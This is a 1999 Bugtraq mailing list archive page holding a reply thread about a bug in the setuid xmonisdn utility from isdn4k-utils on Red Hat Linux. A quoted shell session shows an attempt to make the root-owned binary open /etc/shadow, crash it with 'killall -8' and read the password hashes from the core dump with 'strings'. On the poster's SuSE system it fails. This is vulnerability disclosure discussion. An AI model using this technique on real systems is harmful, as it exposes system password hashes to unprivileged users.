Bugtraq mailing list archives

Re: xmonisdn (isdn4k-utils/Linux) bug report

From: ronvdaal () SYNTONIC NET (Ron van Daal)
Date: Wed, 20 Oct 1999 14:40:43 +0200


Hi Jan-Hendrik,

That's the behaviour I would expect from xmonisdn. A setuid binary
shouldn't dump core if it's being executed by a user which doesn't
match the ownership of the binary. Therefore I think there are two
problems: 1) (small) bug in xmonisdn 2) a bug in my Linux system.

The problem appeared on my desktop system (RedHat kernel 2.2.5-15),
but I couldn't reproduce it on one of my other Linux systems (using
kernels 2.0.36 and 2.2.12-OpenWall).

--
Ron van Daal          | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal () syntonic net | www.syntonic.net  | fax. +31(0)46-4230739

On Wed, 20 Oct 1999, Jan-Hendrik Terstegge wrote:

On Tue, 19 Oct 1999 Ron wrote:

While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.
I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)
[... exploit ...]

I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it
seems as if it was an only RedHat Linux exploit.
This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my
xmonisdn dies only with an Floating exception but it doesn't dump a core.

---snip---
[pts/> [pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x    1       root    root    15340   Jul 23 01:20 xmonisdn
[pts/> [pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow

[1]  +   Stopped                      xmonisdn -file /etc/shadow
[pts/> [pts/0@tatooine] /usr/bin > bg
[1]     xmonisdn -file /etc/shadow &
[pts/> [pts/0@tatooine] /usr/bin > killall -8 xmonisdn
[1]     Floating exception            xmonisdn -file /etc/shadow
[pts/> [pts/0@tatooine] /usr/bin > strings core |less
strings: core: File or Directory not found
---snip---


--
Jan-Hendrik Terstegge
<sysadmin () tatooine ping de>

Current thread:

Microsoft Security Bulletin (MS99-044), (continued)
- - - Microsoft Security Bulletin (MS99-044) Aleph One (Oct 20)
    - Re: execve bug linux-2.2.12 Timo Felbinger (Oct 20)
    - CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Aleph One (Oct 20)
    - Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Richard Trott (Oct 20)
    - Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Chad Price (Oct 21)
    - Re: CERT Advisory CA-99.13 - Multiple Vulnerabilities in WU-FTPD Gregory A Lundberg (Oct 21)
    - Remote DoS in Axent's Raptor 6.0 Mike Frantzen (Oct 20)
    - xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 18)
    - Re: xmonisdn (isdn4k-utils/Linux) bug report Jan-Hendrik Terstegge (Oct 20)
    - Last weeks release: whisker (new web scanner) rfp () WIRETRIP NET (Oct 20)
    - Re: xmonisdn (isdn4k-utils/Linux) bug report Ron van Daal (Oct 20)
    - Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication Olaf Selke (Oct 20)
    - DoS in Eicon ISDN Modem is now fixed Aviram Jenik (Oct 20)
  - Re: execve bug linux-2.2.12 security () XIRR COM (Oct 16)
  - Microsoft Security Bulletin (MS99-043) Aleph One (Oct 18)
    - Re: Microsoft Security Bulletin (MS99-043) David Schwartz (Oct 18)